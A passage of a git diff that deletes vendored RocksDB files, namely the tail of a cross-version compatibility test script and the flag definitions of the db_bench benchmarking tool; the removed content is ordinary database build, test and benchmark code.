-  echo == Generating random input file ${input_data[$i]}
-  python - <<EOF
-import random
-random.seed($i)
-symbols=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
-with open('${input_data[$i]}', 'w') as f:
-  for i in range(1,1024):
-    k = ""
-    for j in range(1, random.randint(1,32)):
-      k=k + symbols[random.randint(0, len(symbols) - 1)]
-    vb = ""
-    for j in range(1, random.randint(0,128)):
-      vb = vb + symbols[random.randint(0, len(symbols) - 1)]
-    v = ""
-    for j in range(1, random.randint(1, 5)):
-      v = v + vb
-    print >> f, k + " ==> " + v
-EOF
-done
-
-declare -a backward_compatible_checkout_objs=("2.2.fb.branch" "2.3.fb.branch" "2.4.fb.branch" "2.5.fb.branch" "2.6.fb.branch" "2.7.fb.branch" "2.8.1.fb" "3.0.fb.branch" "3.1.fb" "3.2.fb" "3.3.fb" "3.4.fb" "3.5.fb" "3.6.fb" "3.7.fb" "3.8.fb" "3.9.fb")
-declare -a forward_compatible_checkout_objs=("3.10.fb" "3.11.fb" "3.12.fb" "3.13.fb" "4.0.fb" "4.1.fb" "4.2.fb" "4.3.fb" "4.4.fb" "4.5.fb" "4.6.fb" "4.7.fb" "4.8.fb" "4.9.fb" "4.10.fb" "4.11.fb" "4.12.fb" "4.13.fb" "5.0.fb" "5.1.fb" "5.2.fb" "5.3.fb" "5.4.fb" "5.5.fb" "5.6.fb")
-declare -a checkout_objs=(${backward_compatible_checkout_objs[@]} ${forward_compatible_checkout_objs[@]})
-
-generate_db()
-{
-    set +e
-    $script_copy_dir/generate_random_db.sh $1 $2
-    if [ $? -ne 0 ]; then
-        echo ==== Error loading data from $2 to $1 ====
-        exit 1
-    fi
-    set -e
-}
-
-compare_db()
-{
-    set +e
-    $script_copy_dir/verify_random_db.sh $1 $2 $3 $4
-    if [ $? -ne 0 ]; then
-        echo ==== Read different content from $1 and $2 or error happened. ====
-        exit 1
-    fi
-    set -e
-}
-
-# Sandcastle sets us up with a remote that is just another directory on the same
-# machine and doesn't have our branches. Need to fetch them so checkout works.
-# Remote add may fail if added previously (we don't cleanup).
-git remote add github_origin "https://github.com/facebook/rocksdb.git"
-set -e
-https_proxy="fwdproxy:8080" git fetch github_origin
-
-for checkout_obj in "${checkout_objs[@]}"
-do
-   echo == Generating DB from "$checkout_obj" ...
-   https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj
-   make clean
-   make ldb -j32
-   generate_db $input_data_path $test_dir/$checkout_obj
-done
-
-checkout_flag=${1:-"master"}
-
-echo == Building $checkout_flag debug
-https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b tmp-$checkout_flag
-make clean
-make ldb -j32
-compare_base_db_dir=$test_dir"/base_db_dir"
-echo == Generate compare base DB to $compare_base_db_dir
-generate_db $input_data_path $compare_base_db_dir
-
-for checkout_obj in "${checkout_objs[@]}"
-do
-   echo == Opening DB from "$checkout_obj" using debug build of $checkout_flag ...
-   compare_db $test_dir/$checkout_obj $compare_base_db_dir db_dump.txt 1
-done
-
-for checkout_obj in "${forward_compatible_checkout_objs[@]}"
-do
-   echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag...
-   git checkout $checkout_obj
-   make clean
-   make ldb -j32
-   compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0
-done
-
-echo ==== Compatibility Test PASSED ====
diff --git a/thirdparty/rocksdb/tools/db_bench.cc b/thirdparty/rocksdb/tools/db_bench.cc
deleted file mode 100644
index 634bbba..0000000
--- a/thirdparty/rocksdb/tools/db_bench.cc
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2013-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-#include <rocksdb/db_bench_tool.h>
-int main(int argc, char** argv) { return rocksdb::db_bench_tool(argc, argv); }
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/tools/db_bench_tool.cc b/thirdparty/rocksdb/tools/db_bench_tool.cc
deleted file mode 100644
index 0f89095..0000000
--- a/thirdparty/rocksdb/tools/db_bench_tool.cc
+++ /dev/null
@@ -1,5328 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#ifdef GFLAGS
-#ifdef NUMA
-#include <numa.h>
-#include <numaif.h>
-#endif
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <fcntl.h>
-#include <gflags/gflags.h>
-#include <inttypes.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/types.h>
-#include <atomic>
-#include <condition_variable>
-#include <cstddef>
-#include <memory>
-#include <mutex>
-#include <thread>
-#include <unordered_map>
-
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "hdfs/env_hdfs.h"
-#include "monitoring/histogram.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/utilities/object_registry.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/options_util.h"
-#include "rocksdb/utilities/sim_cache.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/write_batch.h"
-#include "util/cast_util.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "util/testutil.h"
-#include "util/transaction_test_util.h"
-#include "util/xxhash.h"
-#include "utilities/blob_db/blob_db.h"
-#include "utilities/merge_operators.h"
-#include "utilities/persistent_cache/block_cache_tier.h"
-
-#ifdef OS_WIN
-#include <io.h>  // open/close
-#endif
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_string(
-    benchmarks,
-    "fillseq,"
-    "fillseqdeterministic,"
-    "fillsync,"
-    "fillrandom,"
-    "filluniquerandomdeterministic,"
-    "overwrite,"
-    "readrandom,"
-    "newiterator,"
-    "newiteratorwhilewriting,"
-    "seekrandom,"
-    "seekrandomwhilewriting,"
-    "seekrandomwhilemerging,"
-    "readseq,"
-    "readreverse,"
-    "compact,"
-    "compactall,"
-    "readrandom,"
-    "multireadrandom,"
-    "readseq,"
-    "readtocache,"
-    "readreverse,"
-    "readwhilewriting,"
-    "readwhilemerging,"
-    "readrandomwriterandom,"
-    "updaterandom,"
-    "randomwithverify,"
-    "fill100K,"
-    "crc32c,"
-    "xxhash,"
-    "compress,"
-    "uncompress,"
-    "acquireload,"
-    "fillseekseq,"
-    "randomtransaction,"
-    "randomreplacekeys,"
-    "timeseries",
-
-    "Comma-separated list of operations to run in the specified"
-    " order. Available benchmarks:\n"
-    "\tfillseq       -- write N values in sequential key"
-    " order in async mode\n"
-    "\tfillseqdeterministic       -- write N values in the specified"
-    " key order and keep the shape of the LSM tree\n"
-    "\tfillrandom    -- write N values in random key order in async"
-    " mode\n"
-    "\tfilluniquerandomdeterministic       -- write N values in a random"
-    " key order and keep the shape of the LSM tree\n"
-    "\toverwrite     -- overwrite N values in random key order in"
-    " async mode\n"
-    "\tfillsync      -- write N/100 values in random key order in "
-    "sync mode\n"
-    "\tfill100K      -- write N/1000 100K values in random order in"
-    " async mode\n"
-    "\tdeleteseq     -- delete N keys in sequential order\n"
-    "\tdeleterandom  -- delete N keys in random order\n"
-    "\treadseq       -- read N times sequentially\n"
-    "\treadtocache   -- 1 thread reading database sequentially\n"
-    "\treadreverse   -- read N times in reverse order\n"
-    "\treadrandom    -- read N times in random order\n"
-    "\treadmissing   -- read N missing keys in random order\n"
-    "\treadwhilewriting      -- 1 writer, N threads doing random "
-    "reads\n"
-    "\treadwhilemerging      -- 1 merger, N threads doing random "
-    "reads\n"
-    "\treadrandomwriterandom -- N threads doing random-read, "
-    "random-write\n"
-    "\tprefixscanrandom      -- prefix scan N times in random order\n"
-    "\tupdaterandom  -- N threads doing read-modify-write for random "
-    "keys\n"
-    "\tappendrandom  -- N threads doing read-modify-write with "
-    "growing values\n"
-    "\tmergerandom   -- same as updaterandom/appendrandom using merge"
-    " operator. "
-    "Must be used with merge_operator\n"
-    "\treadrandommergerandom -- perform N random read-or-merge "
-    "operations. Must be used with merge_operator\n"
-    "\tnewiterator   -- repeated iterator creation\n"
-    "\tseekrandom    -- N random seeks, call Next seek_nexts times "
-    "per seek\n"
-    "\tseekrandomwhilewriting -- seekrandom and 1 thread doing "
-    "overwrite\n"
-    "\tseekrandomwhilemerging -- seekrandom and 1 thread doing "
-    "merge\n"
-    "\tcrc32c        -- repeated crc32c of 4K of data\n"
-    "\txxhash        -- repeated xxHash of 4K of data\n"
-    "\tacquireload   -- load N*1000 times\n"
-    "\tfillseekseq   -- write N values in sequential key, then read "
-    "them by seeking to each key\n"
-    "\trandomtransaction     -- execute N random transactions and "
-    "verify correctness\n"
-    "\trandomreplacekeys     -- randomly replaces N keys by deleting "
-    "the old version and putting the new version\n\n"
-    "\ttimeseries            -- 1 writer generates time series data "
-    "and multiple readers doing random reads on id\n\n"
-    "Meta operations:\n"
-    "\tcompact     -- Compact the entire DB; If multiple, randomly choose one\n"
-    "\tcompactall  -- Compact the entire DB\n"
-    "\tstats       -- Print DB stats\n"
-    "\tresetstats  -- Reset DB stats\n"
-    "\tlevelstats  -- Print the number of files and bytes per level\n"
-    "\tsstables    -- Print sstable info\n"
-    "\theapprofile -- Dump a heap profile (if supported by this"
-    " port)\n");
-
-DEFINE_int64(num, 1000000, "Number of key/values to place in database");
-
-DEFINE_int64(numdistinct, 1000,
-             "Number of distinct keys to use. Used in RandomWithVerify to "
-             "read/write on fewer keys so that gets are more likely to find the"
-             " key and puts are more likely to update the same key");
-
-DEFINE_int64(merge_keys, -1,
-             "Number of distinct keys to use for MergeRandom and "
-             "ReadRandomMergeRandom. "
-             "If negative, there will be FLAGS_num keys.");
-DEFINE_int32(num_column_families, 1, "Number of Column Families to use.");
-
-DEFINE_int32(
-    num_hot_column_families, 0,
-    "Number of Hot Column Families. If more than 0, only write to this "
-    "number of column families. After finishing all the writes to them, "
-    "create new set of column families and insert to them. Only used "
-    "when num_column_families > 1.");
-
-DEFINE_string(column_family_distribution, "",
-              "Comma-separated list of percentages, where the ith element "
-              "indicates the probability of an op using the ith column family. "
-              "The number of elements must be `num_hot_column_families` if "
-              "specified; otherwise, it must be `num_column_families`. The "
-              "sum of elements must be 100. E.g., if `num_column_families=4`, "
-              "and `num_hot_column_families=0`, a valid list could be "
-              "\"10,20,30,40\".");
-
-DEFINE_int64(reads, -1, "Number of read operations to do.  "
-             "If negative, do FLAGS_num reads.");
-
-DEFINE_int64(deletes, -1, "Number of delete operations to do.  "
-             "If negative, do FLAGS_num deletions.");
-
-DEFINE_int32(bloom_locality, 0, "Control bloom filter probes locality");
-
-DEFINE_int64(seed, 0, "Seed base for random number generators. "
-             "When 0 it is deterministic.");
-
-DEFINE_int32(threads, 1, "Number of concurrent threads to run.");
-
-DEFINE_int32(duration, 0, "Time in seconds for the random-ops tests to run."
-             " When 0 then num & reads determine the test duration");
-
-DEFINE_int32(value_size, 100, "Size of each value");
-
-DEFINE_int32(seek_nexts, 0,
-             "How many times to call Next() after Seek() in "
-             "fillseekseq, seekrandom, seekrandomwhilewriting and "
-             "seekrandomwhilemerging");
-
-DEFINE_bool(reverse_iterator, false,
-            "When true use Prev rather than Next for iterators that do "
-            "Seek and then Next");
-
-DEFINE_bool(use_uint64_comparator, false, "use Uint64 user comparator");
-
-DEFINE_int64(batch_size, 1, "Batch size");
-
-static bool ValidateKeySize(const char* flagname, int32_t value) {
-  return true;
-}
-
-static bool ValidateUint32Range(const char* flagname, uint64_t value) {
-  if (value > std::numeric_limits<uint32_t>::max()) {
-    fprintf(stderr, "Invalid value for --%s: %lu, overflow\n", flagname,
-            (unsigned long)value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_int32(key_size, 16, "size of each key");
-
-DEFINE_int32(num_multi_db, 0,
-             "Number of DBs used in the benchmark. 0 means single DB.");
-
-DEFINE_double(compression_ratio, 0.5, "Arrange to generate values that shrink"
-              " to this fraction of their original size after compression");
-
-DEFINE_double(read_random_exp_range, 0.0,
-              "Read random's key will be generated using distribution of "
-              "num * exp(-r) where r is uniform number from 0 to this value. "
-              "The larger the number is, the more skewed the reads are. "
-              "Only used in readrandom and multireadrandom benchmarks.");
-
-DEFINE_bool(histogram, false, "Print histogram of operation timings");
-
-DEFINE_bool(enable_numa, false,
-            "Make operations aware of NUMA architecture and bind memory "
-            "and cpus corresponding to nodes together. In NUMA, memory "
-            "in same node as CPUs are closer when compared to memory in "
-            "other nodes. Reads can be faster when the process is bound to "
-            "CPU and memory of same node. Use \"$numactl --hardware\" command "
-            "to see NUMA memory architecture.");
-
-DEFINE_int64(db_write_buffer_size, rocksdb::Options().db_write_buffer_size,
-             "Number of bytes to buffer in all memtables before compacting");
-
-DEFINE_bool(cost_write_buffer_to_cache, false,
-            "The usage of memtable is costed to the block cache");
-
-DEFINE_int64(write_buffer_size, rocksdb::Options().write_buffer_size,
-             "Number of bytes to buffer in memtable before compacting");
-
-DEFINE_int32(max_write_buffer_number,
-             rocksdb::Options().max_write_buffer_number,
-             "The number of in-memory memtables. Each memtable is of size"
-             "write_buffer_size.");
-
-DEFINE_int32(min_write_buffer_number_to_merge,
-             rocksdb::Options().min_write_buffer_number_to_merge,
-             "The minimum number of write buffers that will be merged together"
-             "before writing to storage. This is cheap because it is an"
-             "in-memory merge. If this feature is not enabled, then all these"
-             "write buffers are flushed to L0 as separate files and this "
-             "increases read amplification because a get request has to check"
-             " in all of these files. Also, an in-memory merge may result in"
-             " writing less data to storage if there are duplicate records "
-             " in each of these individual write buffers.");
-
-DEFINE_int32(max_write_buffer_number_to_maintain,
-             rocksdb::Options().max_write_buffer_number_to_maintain,
-             "The total maximum number of write buffers to maintain in memory "
-             "including copies of buffers that have already been flushed. "
-             "Unlike max_write_buffer_number, this parameter does not affect "
-             "flushing. This controls the minimum amount of write history "
-             "that will be available in memory for conflict checking when "
-             "Transactions are used. If this value is too low, some "
-             "transactions may fail at commit time due to not being able to "
-             "determine whether there were any write conflicts. Setting this "
-             "value to 0 will cause write buffers to be freed immediately "
-             "after they are flushed.  If this value is set to -1, "
-             "'max_write_buffer_number' will be used.");
-
-DEFINE_int32(max_background_jobs,
-             rocksdb::Options().max_background_jobs,
-             "The maximum number of concurrent background jobs that can occur "
-             "in parallel.");
-
-DEFINE_int32(num_bottom_pri_threads, 0,
-             "The number of threads in the bottom-priority thread pool (used "
-             "by universal compaction only).");
-
-DEFINE_int32(num_high_pri_threads, 0,
-             "The maximum number of concurrent background compactions"
-             " that can occur in parallel.");
-
-DEFINE_int32(num_low_pri_threads, 0,
-             "The maximum number of concurrent background compactions"
-             " that can occur in parallel.");
-
-DEFINE_int32(max_background_compactions,
-             rocksdb::Options().max_background_compactions,
-             "The maximum number of concurrent background compactions"
-             " that can occur in parallel.");
-
-DEFINE_int32(base_background_compactions, -1, "DEPRECATED");
-
-DEFINE_uint64(subcompactions, 1,
-              "Maximum number of subcompactions to divide L0-L1 compactions "
-              "into.");
-static const bool FLAGS_subcompactions_dummy
-    __attribute__((unused)) = RegisterFlagValidator(&FLAGS_subcompactions,
-                                                    &ValidateUint32Range);
-
-DEFINE_int32(max_background_flushes,
-             rocksdb::Options().max_background_flushes,
-             "The maximum number of concurrent background flushes"
-             " that can occur in parallel.");
-
-static rocksdb::CompactionStyle FLAGS_compaction_style_e;
-DEFINE_int32(compaction_style, (int32_t) rocksdb::Options().compaction_style,
-             "style of compaction: level-based, universal and fifo");
-
-static rocksdb::CompactionPri FLAGS_compaction_pri_e;
-DEFINE_int32(compaction_pri, (int32_t)rocksdb::Options().compaction_pri,
-             "priority of files to compaction: by size or by data age");
-
-DEFINE_int32(universal_size_ratio, 0,
-             "Percentage flexibility while comparing file size"
-             " (for universal compaction only).");
-
-DEFINE_int32(universal_min_merge_width, 0, "The minimum number of files in a"
-             " single compaction run (for universal compaction only).");
-
-DEFINE_int32(universal_max_merge_width, 0, "The max number of files to compact"
-             " in universal style compaction");
-
-DEFINE_int32(universal_max_size_amplification_percent, 0,
-             "The max size amplification for universal style compaction");
-
-DEFINE_int32(universal_compression_size_percent, -1,
-             "The percentage of the database to compress for universal "
-             "compaction. -1 means compress everything.");
-
-DEFINE_bool(universal_allow_trivial_move, false,
-            "Allow trivial move in universal compaction.");
-
-DEFINE_int64(cache_size, 8 << 20,  // 8MB
-             "Number of bytes to use as a cache of uncompressed data");
-
-DEFINE_int32(cache_numshardbits, 6,
-             "Number of shards for the block cache"
-             " is 2 ** cache_numshardbits. Negative means use default settings."
-             " This is applied only if FLAGS_cache_size is non-negative.");
-
-DEFINE_double(cache_high_pri_pool_ratio, 0.0,
-              "Ratio of block cache reserve for high pri blocks. "
-              "If > 0.0, we also enable "
-              "cache_index_and_filter_blocks_with_high_priority.");
-
-DEFINE_bool(use_clock_cache, false,
-            "Replace default LRU block cache with clock cache.");
-
-DEFINE_int64(simcache_size, -1,
-             "Number of bytes to use as a simcache of "
-             "uncompressed data. Nagative value disables simcache.");
-
-DEFINE_bool(cache_index_and_filter_blocks, false,
-            "Cache index/filter blocks in block cache.");
-
-DEFINE_bool(partition_index_and_filters, false,
-            "Partition index and filter blocks.");
-
-DEFINE_int64(metadata_block_size,
-             rocksdb::BlockBasedTableOptions().metadata_block_size,
-             "Max partition size when partitioning index/filters");
-
-// The default reduces the overhead of reading time with flash. With HDD, which
-// offers much less throughput, however, this number better to be set to 1.
-DEFINE_int32(ops_between_duration_checks, 1000,
-             "Check duration limit every x ops");
-
-DEFINE_bool(pin_l0_filter_and_index_blocks_in_cache, false,
-            "Pin index/filter blocks of L0 files in block cache.");
-
-DEFINE_int32(block_size,
-             static_cast<int32_t>(rocksdb::BlockBasedTableOptions().block_size),
-             "Number of bytes in a block.");
-
-DEFINE_int32(block_restart_interval,
-             rocksdb::BlockBasedTableOptions().block_restart_interval,
-             "Number of keys between restart points "
-             "for delta encoding of keys in data block.");
-
-DEFINE_int32(index_block_restart_interval,
-             rocksdb::BlockBasedTableOptions().index_block_restart_interval,
-             "Number of keys between restart points "
-             "for delta encoding of keys in index block.");
-
-DEFINE_int32(read_amp_bytes_per_bit,
-             rocksdb::BlockBasedTableOptions().read_amp_bytes_per_bit,
-             "Number of bytes per bit to be used in block read-amp bitmap");
-
-DEFINE_int64(compressed_cache_size, -1,
-             "Number of bytes to use as a cache of compressed data.");
-
-DEFINE_int64(row_cache_size, 0,
-             "Number of bytes to use as a cache of individual rows"
-             " (0 = disabled).");
-
-DEFINE_int32(open_files, rocksdb::Options().max_open_files,
-             "Maximum number of files to keep open at the same time"
-             " (use default if == 0)");
-
-DEFINE_int32(file_opening_threads, rocksdb::Options().max_file_opening_threads,
-             "If open_files is set to -1, this option set the number of "
-             "threads that will be used to open files during DB::Open()");
-
-DEFINE_bool(new_table_reader_for_compaction_inputs, true,
-             "If true, uses a separate file handle for compaction inputs");
-
-DEFINE_int32(compaction_readahead_size, 0, "Compaction readahead size");
-
-DEFINE_int32(random_access_max_buffer_size, 1024 * 1024,
-             "Maximum windows randomaccess buffer size");
-
-DEFINE_int32(writable_file_max_buffer_size, 1024 * 1024,
-             "Maximum write buffer for Writable File");
-
-DEFINE_int32(bloom_bits, -1, "Bloom filter bits per key. Negative means"
-             " use default settings.");
-DEFINE_double(memtable_bloom_size_ratio, 0,
-              "Ratio of memtable size used for bloom filter. 0 means no bloom "
-              "filter.");
-DEFINE_bool(memtable_use_huge_page, false,
-            "Try to use huge page in memtables.");
-
-DEFINE_bool(use_existing_db, false, "If true, do not destroy the existing"
-            " database.  If you set this flag and also specify a benchmark that"
-            " wants a fresh database, that benchmark will fail.");
-
-DEFINE_bool(show_table_properties, false,
-            "If true, then per-level table"
-            " properties will be printed on every stats-interval when"
-            " stats_interval is set and stats_per_interval is on.");
-
-DEFINE_string(db, "", "Use the db with the following name.");
-
-// Read cache flags
-
-DEFINE_string(read_cache_path, "",
-              "If not empty string, a read cache will be used in this path");
-
-DEFINE_int64(read_cache_size, 4LL * 1024 * 1024 * 1024,
-             "Maximum size of the read cache");
-
-DEFINE_bool(read_cache_direct_write, true,
-            "Whether to use Direct IO for writing to the read cache");
-
-DEFINE_bool(read_cache_direct_read, true,
-            "Whether to use Direct IO for reading from read cache");
-
-static bool ValidateCacheNumshardbits(const char* flagname, int32_t value) {
-  if (value >= 20) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be < 20\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_bool(verify_checksum, true,
-            "Verify checksum for every block read"
-            " from storage");
-
-DEFINE_bool(statistics, false, "Database statistics");
-DEFINE_string(statistics_string, "", "Serialized statistics string");
-static class std::shared_ptr<rocksdb::Statistics> dbstats;
-
-DEFINE_int64(writes, -1, "Number of write operations to do. If negative, do"
-             " --num reads.");
-
-DEFINE_bool(finish_after_writes, false, "Write thread terminates after all writes are finished");
-
-DEFINE_bool(sync, false, "Sync all writes to disk");
-
-DEFINE_bool(use_fsync, false, "If true, issue fsync instead of fdatasync");
-
-DEFINE_bool(disable_wal, false, "If true, do not write WAL for write.");
-
-DEFINE_string(wal_dir, "", "If not empty, use the given dir for WAL");
-
-DEFINE_string(truth_db, "/dev/shm/truth_db/dbbench",
-              "Truth key/values used when using verify");
-
-DEFINE_int32(num_levels, 7, "The total number of levels");
-
-DEFINE_int64(target_file_size_base, rocksdb::Options().target_file_size_base,
-             "Target file size at level-1");
-
-DEFINE_int32(target_file_size_multiplier,
-             rocksdb::Options().target_file_size_multiplier,
-             "A multiplier to compute target level-N file size (N >= 2)");
-
-DEFINE_uint64(max_bytes_for_level_base,
-              rocksdb::Options().max_bytes_for_level_base,
-              "Max bytes for level-1");
-
-DEFINE_bool(level_compaction_dynamic_level_bytes, false,
-            "Whether level size base is dynamic");
-
-DEFINE_double(max_bytes_for_level_multiplier, 10,
-              "A multiplier to compute max bytes for level-N (N >= 2)");
-
-static std::vector<int> FLAGS_max_bytes_for_level_multiplier_additional_v;
-DEFINE_string(max_bytes_for_level_multiplier_additional, "",
-              "A vector that specifies additional fanout per level");
-
-DEFINE_int32(level0_stop_writes_trigger,
-             rocksdb::Options().level0_stop_writes_trigger,
-             "Number of files in level-0"
-             " that will trigger put stop.");
-
-DEFINE_int32(level0_slowdown_writes_trigger,
-             rocksdb::Options().level0_slowdown_writes_trigger,
-             "Number of files in level-0"
-             " that will slow down writes.");
-
-DEFINE_int32(level0_file_num_compaction_trigger,
-             rocksdb::Options().level0_file_num_compaction_trigger,
-             "Number of files in level-0"
-             " when compactions start");
-
-static bool ValidateInt32Percent(const char* flagname, int32_t value) {
-  if (value <= 0 || value>=100) {
-    fprintf(stderr, "Invalid value for --%s: %d, 0< pct <100 \n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(readwritepercent, 90, "Ratio of reads to reads/writes (expressed"
-             " as percentage) for the ReadRandomWriteRandom workload. The "
-             "default value 90 means 90% operations out of all reads and writes"
-             " operations are reads. In other words, 9 gets for every 1 put.");
-
-DEFINE_int32(mergereadpercent, 70, "Ratio of merges to merges&reads (expressed"
-             " as percentage) for the ReadRandomMergeRandom workload. The"
-             " default value 70 means 70% out of all read and merge operations"
-             " are merges. In other words, 7 merges for every 3 gets.");
-
-DEFINE_int32(deletepercent, 2, "Percentage of deletes out of reads/writes/"
-             "deletes (used in RandomWithVerify only). RandomWithVerify "
-             "calculates writepercent as (100 - FLAGS_readwritepercent - "
-             "deletepercent), so deletepercent must be smaller than (100 - "
-             "FLAGS_readwritepercent)");
-
-DEFINE_bool(optimize_filters_for_hits, false,
-            "Optimizes bloom filters for workloads for most lookups return "
-            "a value. For now this doesn't create bloom filters for the max "
-            "level of the LSM to reduce metadata that should fit in RAM. ");
-
-DEFINE_uint64(delete_obsolete_files_period_micros, 0,
-              "Ignored. Left here for backward compatibility");
-
-DEFINE_int64(writes_per_range_tombstone, 0,
-             "Number of writes between range "
-             "tombstones");
-
-DEFINE_int64(range_tombstone_width, 100, "Number of keys in tombstone's range");
-
-DEFINE_int64(max_num_range_tombstones, 0,
-             "Maximum number of range tombstones "
-             "to insert.");
-
-DEFINE_bool(expand_range_tombstones, false,
-            "Expand range tombstone into sequential regular tombstones.");
-
-#ifndef ROCKSDB_LITE
-DEFINE_bool(optimistic_transaction_db, false,
-            "Open a OptimisticTransactionDB instance. "
-            "Required for randomtransaction benchmark.");
-
-DEFINE_bool(use_blob_db, false,
-            "Open a BlobDB instance. "
-            "Required for largevalue benchmark.");
-
-DEFINE_bool(transaction_db, false,
-            "Open a TransactionDB instance. "
-            "Required for randomtransaction benchmark.");
-
-DEFINE_uint64(transaction_sets, 2,
-              "Number of keys each transaction will "
-              "modify (use in RandomTransaction only).  Max: 9999");
-
-DEFINE_bool(transaction_set_snapshot, false,
-            "Setting to true will have each transaction call SetSnapshot()"
-            " upon creation.");
-
-DEFINE_int32(transaction_sleep, 0,
-             "Max microseconds to sleep in between "
-             "reading and writing a value (used in RandomTransaction only). ");
-
-DEFINE_uint64(transaction_lock_timeout, 100,
-              "If using a transaction_db, specifies the lock wait timeout in"
-              " milliseconds before failing a transaction waiting on a lock");
-DEFINE_string(
-    options_file, "",
-    "The path to a RocksDB options file.  If specified, then db_bench will "
-    "run with the RocksDB options in the default column family of the "
-    "specified options file. "
-    "Note that with this setting, db_bench will ONLY accept the following "
-    "RocksDB options related command-line arguments, all other arguments "
-    "that are related to RocksDB options will be ignored:\n"
-    "\t--use_existing_db\n"
-    "\t--statistics\n"
-    "\t--row_cache_size\n"
-    "\t--row_cache_numshardbits\n"
-    "\t--enable_io_prio\n"
-    "\t--dump_malloc_stats\n"
-    "\t--num_multi_db\n");
-
-DEFINE_uint64(fifo_compaction_max_table_files_size_mb, 0,
-              "The limit of total table file sizes to trigger FIFO compaction");
-DEFINE_bool(fifo_compaction_allow_compaction, true,
-            "Allow compaction in FIFO compaction.");
-DEFINE_uint64(fifo_compaction_ttl, 0, "TTL for the SST Files in seconds.");
-#endif  // ROCKSDB_LITE
-
-DEFINE_bool(report_bg_io_stats, false,
-            "Measure times spents on I/Os while in compactions. ");
-
-DEFINE_bool(use_stderr_info_logger, false,
-            "Write info logs to stderr instead of to LOG file. ");
-
-static enum rocksdb::CompressionType StringToCompressionType(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "none"))
-    return rocksdb::kNoCompression;
-  else if (!strcasecmp(ctype, "snappy"))
-    return rocksdb::kSnappyCompression;
-  else if (!strcasecmp(ctype, "zlib"))
-    return rocksdb::kZlibCompression;
-  else if (!strcasecmp(ctype, "bzip2"))
-    return rocksdb::kBZip2Compression;
-  else if (!strcasecmp(ctype, "lz4"))
-    return rocksdb::kLZ4Compression;
-  else if (!strcasecmp(ctype, "lz4hc"))
-    return rocksdb::kLZ4HCCompression;
-  else if (!strcasecmp(ctype, "xpress"))
-    return rocksdb::kXpressCompression;
-  else if (!strcasecmp(ctype, "zstd"))
-    return rocksdb::kZSTD;
-
-  fprintf(stdout, "Cannot parse compression type '%s'\n", ctype);
-  return rocksdb::kSnappyCompression;  // default value
-}
-
-static std::string ColumnFamilyName(size_t i) {
-  if (i == 0) {
-    return rocksdb::kDefaultColumnFamilyName;
-  } else {
-    char name[100];
-    snprintf(name, sizeof(name), "column_family_name_%06zu", i);
-    return std::string(name);
-  }
-}
-
-DEFINE_string(compression_type, "snappy",
-              "Algorithm to use to compress the database");
-static enum rocksdb::CompressionType FLAGS_compression_type_e =
-    rocksdb::kSnappyCompression;
-
-DEFINE_int32(compression_level, -1,
-             "Compression level. For zlib this should be -1 for the "
-             "default level, or between 0 and 9.");
-
-DEFINE_int32(compression_max_dict_bytes, 0,
-             "Maximum size of dictionary used to prime the compression "
-             "library.");
-
-static bool ValidateCompressionLevel(const char* flagname, int32_t value) {
-  if (value < -1 || value > 9) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be between -1 and 9\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-
-static const bool FLAGS_compression_level_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_compression_level, &ValidateCompressionLevel);
-
